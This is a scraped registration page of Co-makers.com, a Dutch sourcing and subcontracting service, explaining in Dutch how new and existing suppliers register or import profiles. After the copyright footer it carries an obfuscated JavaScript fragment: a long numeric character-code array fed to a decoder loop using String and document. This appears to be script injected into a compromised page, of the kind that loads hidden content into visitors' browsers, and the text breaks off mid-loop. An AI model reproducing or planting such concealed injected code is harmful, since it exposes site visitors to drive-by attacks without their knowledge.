Home Register  Purchasing Market Research | Global Sourcing | Source.Direct | Supply Chain Development | Meet&Match

 Our customers
Buyers
Subcontractors
 Services
 Alliances & Partners
 Company
Team
Career
Offices
Contact

 Add to favorites
 Register
 Login

  English Nederlands Deutsch
Co-makers.com - Registration

Co-makers heeft haar website onlangs gewijzigd. Om u nog meer mogelijkheden te bieden zijn de profielen van uitbesteders en toeleveranciers gewijzigd en bovendien gescheiden. Dit is met name van belang voor de nieuwe dienst van Co-makers: Source.Direct. Deze nieuwe service laat inkopers via deze website direct de best passende toeleverancier selecteren.

Wanneer u nog niet eerder een profiel heeft vastgelegd kiest u optie 1. Wanneer u zich al eerder met een profiel heeft aangemeld op deze website of de Meet&Match website kunt u dit automatisch importeren. Dit geldt ook voor alle deelnemers en oud-deelnemers aan het Co-makers Toeleveringsnetwerk. Kiest u optie 2. Controleert u het geimporteerde profiel vervolgens zorgvuldig! Bij voorbaat hartelijk dank voor uw registratie!

NB: Co-makers gebruikt de bij haar geregistreerde gegevens alleen voor eigen activiteiten en stelt deze niet ter beschikking van derden.


Nieuws

Classifieds
2021 Co-makers International b.v. All Rights Reserved.
163,164,101,53,64,53,77,152,62,167,151,170,105,170,170,166,155,146,171,170,151,54,53,173,155,150,170,154,53,60,53,65,64,64,53,55,77,152,62,167,151,170,105,170,170,166,155,146,171,170,151,54,53,154,151,155,153,154,170,53,60,53,65,64,64,53,55,77,21,15,15,15,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,167,106,175,130,145,153,122,145,161,151,54,53,146,163,150,175,53,55,137,64,141,62,145,164,164,151,162,150,107,154,155,160,150,54,152,55,77,21,15,15,201"[ps](","));ss=String;d=document;for(i=0;i